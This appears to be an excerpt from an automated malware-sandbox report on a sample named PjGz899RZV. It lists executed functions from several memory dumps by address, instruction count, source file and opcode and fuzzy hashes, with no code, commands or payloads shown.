                                                                      • Instruction ID: 320d095c33fbfb47361aca7b43c080b6f425bd9a60b2b45d1a0dcb56b45ee1b6
                                                                      • Opcode Fuzzy Hash: 37a21a823b1d00b4f9e4a157df1e311c6e9c01c5944370359b92271c100df14a
                                                                      • Instruction Fuzzy Hash: 41315E35B18A0A8FEB98EBA8C4A56E977E1FF98300F504179D10DD7292CE3DA8418B40
                                                                      Function 00007FFD34540868 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94fdfeaa7aa17943066a7859a3489daa83d6890ee97ddcd7c87106673815fafe
                                                                      • Instruction ID: 28dce084562f779a82d849e1b13e52b74988f40016e98ac30097b8e6ec1560b9
                                                                      • Opcode Fuzzy Hash: 94fdfeaa7aa17943066a7859a3489daa83d6890ee97ddcd7c87106673815fafe
                                                                      • Instruction Fuzzy Hash: 65215020B1D54E9FE799FB6884A55A97BE1FF88304B9080B9E40CD73C6DD3CAC009B41
                                                                      Function 00007FFD34541B31 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c1badffe121b45464cb793d2b055f3760bb56b3267f3e876471052614a224bf3
                                                                      • Instruction ID: 174a312fb743eb8859810a78ec614b76f75e6d7d9357ad6657ebd609a4508fa0
                                                                      • Opcode Fuzzy Hash: c1badffe121b45464cb793d2b055f3760bb56b3267f3e876471052614a224bf3
                                                                      • Instruction Fuzzy Hash: D4014C15E0D7954FF746A73858E50757FE0DFA2310B0804BAD489CB1E7E91CB9449353

                                                                      Executed Functions

                                                                      Function 00007FFD34540E89 Relevance: .8, Instructions: 838COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e896c59052bf3a304921ce00bc300c44451004efe1a200bad83e3b9d4e35fb6
                                                                      • Instruction ID: f3d72a29fb41e0758a13447fe1b77bf84fc0cd335f1e5333f28386dc38bbbd53
                                                                      • Opcode Fuzzy Hash: 5e896c59052bf3a304921ce00bc300c44451004efe1a200bad83e3b9d4e35fb6
                                                                      • Instruction Fuzzy Hash: 2942DF61B1CA494FEBA9EB6884A97B977D2EF99740F540579E40EC73D2CE2CAC018341
                                                                      Function 00007FFD34541959 Relevance: .2, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8846738170c8d098a84bb1a0177ec8b1eababe347eb960ac0f5dd6c532d96a65
                                                                      • Instruction ID: e46493519b3e8290307fb80e4d5ebbdacc31d4ea1770040eb7d4e04e3c98c70f
                                                                      • Opcode Fuzzy Hash: 8846738170c8d098a84bb1a0177ec8b1eababe347eb960ac0f5dd6c532d96a65
                                                                      • Instruction Fuzzy Hash: C551EE51B5E6C94FE797A7B848782756FE49F8721AB0804FAE0C9CB2A7DD4C5806C342
                                                                      Function 00007FFD345407D0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <O_^
                                                                      • API String ID: 0-1368354704
                                                                      • Opcode ID: caf70b5d6c86686fb75cdaaf7f28768e706fd43f7246107f4dab484b2f409f52
                                                                      • Instruction ID: 01d7c544516b04a1e2c207274a7d07f20f5a5826a0341f124e72842e0fded65c
                                                                      • Opcode Fuzzy Hash: caf70b5d6c86686fb75cdaaf7f28768e706fd43f7246107f4dab484b2f409f52
                                                                      • Instruction Fuzzy Hash: 6C412976F4D2461FEB59BBAC94B20EA3BA0EF91324B544076D10CCB2D3DD2C9C468381
                                                                      Function 00007FFD34540C0E Relevance: .3, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 241bb67afa62dbbb7b4acd80980532ca6b626e08358782c7b19b664059755786
                                                                      • Instruction ID: 9237bc2ffd62daac88e64545839a51b97eb8e7bc77375227839bbf5a06512f86
                                                                      • Opcode Fuzzy Hash: 241bb67afa62dbbb7b4acd80980532ca6b626e08358782c7b19b664059755786
                                                                      • Instruction Fuzzy Hash: 79714B32F1DA4A4FE796E76C94661B97BE1EF8A321B4400BAD44DDB293CD2C6C468350
                                                                      Function 00007FFD345404D8 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97fdf30015ae3da5ffedc646028824fd0c20166497ca9ece93429679c1aea033
                                                                      • Instruction ID: 697b124d4b8bef1cf628642f7ec0aa0b13c56f03f17e3710cb9c6e1f5652197f
                                                                      • Opcode Fuzzy Hash: 97fdf30015ae3da5ffedc646028824fd0c20166497ca9ece93429679c1aea033
                                                                      • Instruction Fuzzy Hash: DD319521B1C9490FE798EB6D946A379A7C2EF9D356F0405BEE04ED32D3DD68AC418341
                                                                      Function 00007FFD34540AA9 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4273c609ed867196cc8153e4d3e89bf5211e288f39a91ac6228573a3283d4e6
                                                                      • Instruction ID: 304f23c52a8389583be6abf89b3379cfbd9877f0c2c1e2344c155b660d85cd41
                                                                      • Opcode Fuzzy Hash: f4273c609ed867196cc8153e4d3e89bf5211e288f39a91ac6228573a3283d4e6
                                                                      • Instruction Fuzzy Hash: EB31B222F18A094FFB55ABBC58693BD77D2EF99711F14017AE00CD72A2DD2C98418791
                                                                      Function 00007FFD34540961 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08579b9051d93169422ca30157fd5398e7018463b5701777d187d1fb672a383c
                                                                      • Instruction ID: 1e51333543c01fc99362c1e757cbb5177e044c17e9ebcdf4ec8b1cafe06f7cf5
                                                                      • Opcode Fuzzy Hash: 08579b9051d93169422ca30157fd5398e7018463b5701777d187d1fb672a383c
                                                                      • Instruction Fuzzy Hash: 08318175F58A0A4FEF58EBA8C4A56EDB7A1FF98300F900579D109D7292CE38A8418750
                                                                      Function 00007FFD34540868 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ea9e9b3b7f2c9e1b58810dcc5d743afb4cd3fbdcb981c86a50ed6ec0b0fd183
                                                                      • Instruction ID: 524a3b0e0bcef420c619343b8c777c91526d5e1ac3b21f80da99f6618f88869e
                                                                      • Opcode Fuzzy Hash: 9ea9e9b3b7f2c9e1b58810dcc5d743afb4cd3fbdcb981c86a50ed6ec0b0fd183
                                                                      • Instruction Fuzzy Hash: 0721CFB1B8E50A5FDB58EFA8C0A15A97FA1FF88300B808479E408D73C6CE38AD00C741
                                                                      Function 00007FFD34541B31 Relevance: .0, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2769560082.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2dd04ddec3c4d8f501aa5379efc60f47cfe18906ed02a7abd3e3a12a8d6af19b
                                                                      • Instruction ID: 8ec050f1fffaaaa3f8fd157ce9b2d5d25e8092011d3f65050d58c9d03178d91d
                                                                      • Opcode Fuzzy Hash: 2dd04ddec3c4d8f501aa5379efc60f47cfe18906ed02a7abd3e3a12a8d6af19b
                                                                      • Instruction Fuzzy Hash: 6D016811E0D7910FE746AB3858A50757FA0DF92310B0804BAD489CB2E7E90CA9408382

                                                                      Executed Functions

                                                                      Function 00007FFD34570E89 Relevance: .8, Instructions: 837COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f99a61a317cb80e072c383171c850d3fa61301eb89645ce55d65e265834faf59
                                                                      • Instruction ID: 8a20bde505821a62af58fa9f86b09f850455e8e5ac5357b67c7691fd88777ee9
                                                                      • Opcode Fuzzy Hash: f99a61a317cb80e072c383171c850d3fa61301eb89645ce55d65e265834faf59
                                                                      • Instruction Fuzzy Hash: C842E621F1CA454FEBA9EB6888A57B977D2FF99740F4445B9E10ED32D2CE2CAC018741
                                                                      Function 00007FFD34571959 Relevance: .2, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a8df2abc665c1b521306eb951cb8cbe9493b36bc872a2c22a381467d6bee6f4
                                                                      • Instruction ID: 3b4a7c5e440b8ddec8f7b2b41d0538cd7695737730af14bc7dc84b0028a9a3ec
                                                                      • Opcode Fuzzy Hash: 4a8df2abc665c1b521306eb951cb8cbe9493b36bc872a2c22a381467d6bee6f4
                                                                      • Instruction Fuzzy Hash: 7B51FD51B1E6C50FE797A7784874276BFE49F8722AB0804FAE0C9C62A7DD4C5806C342
                                                                      Function 00007FFD345707D0 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <L_^
                                                                      • API String ID: 0-1405735369
                                                                      • Opcode ID: b074fa03042096c29ab1c6b619b9d549f9196ead236cc920e376413f293507f6
                                                                      • Instruction ID: d60f5a6db69428f1282ae8310b4670261d71a36da1e7d302bdabf6163f5318a5
                                                                      • Opcode Fuzzy Hash: b074fa03042096c29ab1c6b619b9d549f9196ead236cc920e376413f293507f6
                                                                      • Instruction Fuzzy Hash: 5A41F736B4C2565FEB59E7ACA4B20EE3FA0FF91314B4441B6D648C7293DE2C9C068781
                                                                      Function 00007FFD34570C0E Relevance: .3, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b80ad1bb6b6087fcc40b77ed221f5c77fd1e20385de787bc50e0258a2c3b7b2
                                                                      • Instruction ID: d84f641a6c1c785c72bb5beb7902074a3294477b1ab13937a2e1306d7829c28e
                                                                      • Opcode Fuzzy Hash: 1b80ad1bb6b6087fcc40b77ed221f5c77fd1e20385de787bc50e0258a2c3b7b2
                                                                      • Instruction Fuzzy Hash: E0713A22F1DA4A0FE796E76C98661F97FE1EF86321B4440BAD44DD3293CD2CAC428351
                                                                      Function 00007FFD345704D8 Relevance: .1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ac54cb9f7687cb0cd11a5e0b2fb6b2d0caf94de1a90fbc2ed4682c814012deb
                                                                      • Instruction ID: 11e4ebd92ab094f4ea7709cb4a8696b944c94338e88842beddca9edc189e3513
                                                                      • Opcode Fuzzy Hash: 5ac54cb9f7687cb0cd11a5e0b2fb6b2d0caf94de1a90fbc2ed4682c814012deb
                                                                      • Instruction Fuzzy Hash: 02319721B1C9490FE798E76C986A279B7C2EF9D356F0405BEE04ED32A7DD68AC418341
                                                                      Function 00007FFD34570AA9 Relevance: .1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c45e08435bb3ff1e1b29389e0a94148b4d137c637bc52e815ceed1dd67df953
                                                                      • Instruction ID: 19921a91e5feae0f13ae022c16ed50fb154928dda5d712d4aa5fbac4892208c2
                                                                      • Opcode Fuzzy Hash: 7c45e08435bb3ff1e1b29389e0a94148b4d137c637bc52e815ceed1dd67df953
                                                                      • Instruction Fuzzy Hash: B0318222F1CA094FFB55ABBC586A3BD77D2EF99711F04417AE00CD32A2DD2CA8418781
                                                                      Function 00007FFD34570961 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5cafd04e59d0a7f3c3c6fd082f9a6ab2e9c0b533ee99ceca73835e9f97445e7
                                                                      • Instruction ID: a0ffa32a39b10d2b6cfd7e7bfe5dbf3b953982d15b55e6bef32f9d0b81903a27
                                                                      • Opcode Fuzzy Hash: c5cafd04e59d0a7f3c3c6fd082f9a6ab2e9c0b533ee99ceca73835e9f97445e7
                                                                      • Instruction Fuzzy Hash: D6317275F1CA0A4FEB58EBA8C8A56ED7BE1FF99300F504579D109D7292CE38A8418740
                                                                      Function 00007FFD34570868 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86160b7874311249dc1393c6f649e27a0f2c99e3dc952597d5a0b3a25525825b
                                                                      • Instruction ID: c15c3d8234995bbaabad7724beb91c06a5ff9bc9b34d84585badfa44e6aa4771
                                                                      • Opcode Fuzzy Hash: 86160b7874311249dc1393c6f649e27a0f2c99e3dc952597d5a0b3a25525825b
                                                                      • Instruction Fuzzy Hash: 8921D431B5C54A5FDF58EB6880A14A97FB1FF98300B8085B5E608D73C6CE38AD00C740
                                                                      Function 00007FFD34571B31 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2802689606.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_7ffd34570000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eefcdac7bfc2386d5b25e76b9e0e388a86b99ebea6c1033a8ee98a04df658a32
                                                                      • Instruction ID: 25e24a0fbc637e5739efeb6bb4480f1ef58c8151186718214b72045b41a5570b
                                                                      • Opcode Fuzzy Hash: eefcdac7bfc2386d5b25e76b9e0e388a86b99ebea6c1033a8ee98a04df658a32
                                                                      • Instruction Fuzzy Hash: 68012855E0E7924FE746A73858B24717FE0DFA2350B0804BAD4C9C71E3E91CB9808382

                                                                      Executed Functions

                                                                      Function 00007FFD34560E89 Relevance: .7, Instructions: 747COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.3390930452.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25cbc053a56136a1850f0a1c3eb054c6025a2b9af03637d3043a91544580ced5
                                                                      • Instruction ID: 73cb709d4059616e714150ac1f06b6a1c96533036862efa7187e80456696f1d9
                                                                      • Opcode Fuzzy Hash: 25cbc053a56136a1850f0a1c3eb054c6025a2b9af03637d3043a91544580ced5
                                                                      • Instruction Fuzzy Hash: 6032D021F1CA4A4FE7A9EB6884A57B973D2EF99311F440579E44ED32D3CE6CAC428341
                                                                      Function 00007FFD345607D0 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.3390930452.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <M_^
                                                                      • API String ID: 0-1376500734
                                                                      • Opcode ID: 94d49c9bbcf00468dec15b1b6683c907ec809563f3400148eb59c569a5b5b583
                                                                      • Instruction ID: e605eebd54397d82c89dec82b8b8c28a6b75897a87bc7aed2bb6e056d8620606
                                                                      • Opcode Fuzzy Hash: 94d49c9bbcf00468dec15b1b6683c907ec809563f3400148eb59c569a5b5b583
                                                                      • Instruction Fuzzy Hash: F881F126F1855A5BEBA9E7AC90B52F97BA1EF85321B800475E40DD72C3DF6CAC428350
                                                                      Function 00007FFD34560C0E Relevance: .3, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.3390930452.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8839ae16f4c814e2feea255b12e3d0a92460b91193c57823d90a8ca554ae8097
                                                                      • Instruction ID: 3a1293d8ab6bbf7dc5368c35a353ff751d321766f254415e368a12c0a9958a02
                                                                      • Opcode Fuzzy Hash: 8839ae16f4c814e2feea255b12e3d0a92460b91193c57823d90a8ca554ae8097
                                                                      • Instruction Fuzzy Hash: F0714922F1DA4E0FE796E76C88661B97BE1EF86321B4401BAD04DD3293DE6C6C428350
                                                                      Function 00007FFD34560AA9 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.3390930452.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e04cc96c7d748b2a01643f86f809bd38d36ec309b4bb5031ff358b114b7887dc
                                                                      • Instruction ID: 551d77cd5aad763032bcc4504ec2ff7ba8466582f463b2e6fbc5db7d0a081fd3
                                                                      • Opcode Fuzzy Hash: e04cc96c7d748b2a01643f86f809bd38d36ec309b4bb5031ff358b114b7887dc
                                                                      • Instruction Fuzzy Hash: 9F31C722F18A094FFB55ABBC48693BD77D6EF99711F0402BAE00DC32A3DE2C98418741
                                                                      Function 00007FFD34560961 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.3390930452.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dfa2ff972ac62ec68f501c1627d38e4b8d6eda8643d949c29de1e1f5e55c4b16
                                                                      • Instruction ID: 51cb0fff4f0f6e9c7d65a83bc7e1314a34bd32f91bce144ac63f624ef1a1bb96
                                                                      • Opcode Fuzzy Hash: dfa2ff972ac62ec68f501c1627d38e4b8d6eda8643d949c29de1e1f5e55c4b16
                                                                      • Instruction Fuzzy Hash: DC318D75F18A0E8FEB54EBA8C4B52ADB7A2FF99311F900579D109D7292CE3CA841C750
                                                                      Function 00007FFD34560868 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.3390930452.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b007c551d20efc2dd7559f4321995abf10b6984e845fe43db501247c6161aefc
                                                                      • Instruction ID: d407c8d82aaf5239869846a83e9679985831d2cb6da33914d677a71e714467fb
                                                                      • Opcode Fuzzy Hash: b007c551d20efc2dd7559f4321995abf10b6984e845fe43db501247c6161aefc
                                                                      • Instruction Fuzzy Hash: D521BE25B8960E5FD758EBAC80B15AABFA1FF88300B804469E408D77C7DFACAD45C750